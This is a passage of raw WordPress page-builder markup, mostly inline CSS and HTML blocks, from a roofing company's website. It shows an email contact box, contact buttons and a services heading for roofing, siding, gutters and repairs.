width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:5px;margin-top:5px;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:600;font-family:Poppins;margin-bottom:5px\">Email Us</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:500;margin-bottom:10px\">admin@dunriteroof.com</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"left\"} -->\n<div class=\"left tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"Read More\",\"link\":\"https://dunriteroof.com/contact us\",\"counterId\":\"e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f\",\"vPadding\":15,\"hPadding\":35,\"vMargin\":0,\"hMargin\":0,\"borderRadius\":50,\"borderStyle\":\"none\",\"borderColor\":\"#ffffff\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":16,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 0px !important; margin-bottom: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 15px; padding-bottom: 15px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 35px; padding-right: 35px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: #ffffff; border-radius: 50px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 16px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 16px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://dunriteroof.com/contact us\" rel=\"noopener noreferrer\" target=\"_blank\">Read More</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"781513a3-174d-4594-86c8-5daf7f32af16\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-2\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-2 skt-blocks-block-section-outer-wrap block-781513a3-174d-4594-86c8-5daf7f32af16 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-781513a3-174d-4594-86c8-5daf7f32af16 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-781513a3-174d-4594-86c8-5daf7f32af16 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-781513a3-174d-4594-86c8-5daf7f32af16 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-781513a3-174d-4594-86c8-5daf7f32af16.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-781513a3-174d-4594-86c8-5daf7f32af16.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-781513a3-174d-4594-86c8-5daf7f32af16.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-781513a3-174d-4594-86c8-5daf7f32af16.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-781513a3-174d-4594-86c8-5daf7f32af16.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-781513a3-174d-4594-86c8-5daf7f32af16 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-781513a3-174d-4594-86c8-5daf7f32af16 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-781513a3-174d-4594-86c8-5daf7f32af16.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-781513a3-174d-4594-86c8-5daf7f32af16 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-781513a3-174d-4594-86c8-5daf7f32af16.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-781513a3-174d-4594-86c8-5daf7f32af16 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-781513a3-174d-4594-86c8-5daf7f32af16.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"fead57cb-9c5c-411a-bb72-20bd150b5268\"} -->\n<style type=\"text/css\"> .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-fead57cb-9c5c-411a-bb72-20bd150b5268 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"leftPadding\":15,\"leftPaddingTablet\":15,\"blockId\":\"57952f87-1484-4ebd-851f-822a3d450cc3\"} -->\n<style type=\"text/css\"> .block-57952f87-1484-4ebd-851f-822a3d450cc3 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-57952f87-1484-4ebd-851f-822a3d450cc3 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-57952f87-1484-4ebd-851f-822a3d450cc3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 15px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-57952f87-1484-4ebd-851f-822a3d450cc3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 15px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-57952f87-1484-4ebd-851f-822a3d450cc3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-57952f87-1484-4ebd-851f-822a3d450cc3\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"b7d6108a-a14d-4498-85a9-8c42833b5557\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-b7d6108a-a14d-4498-85a9-8c42833b5557\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Our Services</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Roofing, Siding, Gutters, Repairs</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"rightPadding\":15,\"blockId\":\"63ddace3-1c17-4204-b706-d0b433daef69\"} -->\n<style type=\"text/css\"> .block-63ddace3-1c17-4204-b706-d0b433daef69 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-63ddace3-1c17-4204-b706-d0b433daef69 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-63ddace3-1c17-4204-b706-d0b433daef69 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 15px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-63ddace3-1c17-4204-b706-d0b433daef69 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-63ddace3-1c17-4204-b706-d0b433daef69 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-63ddace3-1c17-4204-b706-d0b433daef69\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"Contact Us\",\"link\":\"https://dunriteroof.com/contact us\",\"counterId\":\"3d60bfc1-b9eb-4ec8-9435-1256841854bd\",\"vPadding\":13,\"hPadding\":27,\"vMargin\":20,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 20px !important; margin-bottom: 20px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 13px; padding-bottom: 13px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 27px; padding-right: 27px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://dunriteroof.com/contact us\" rel=\"noopener noreferrer\" target=\"_blank\">Contact Us</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- 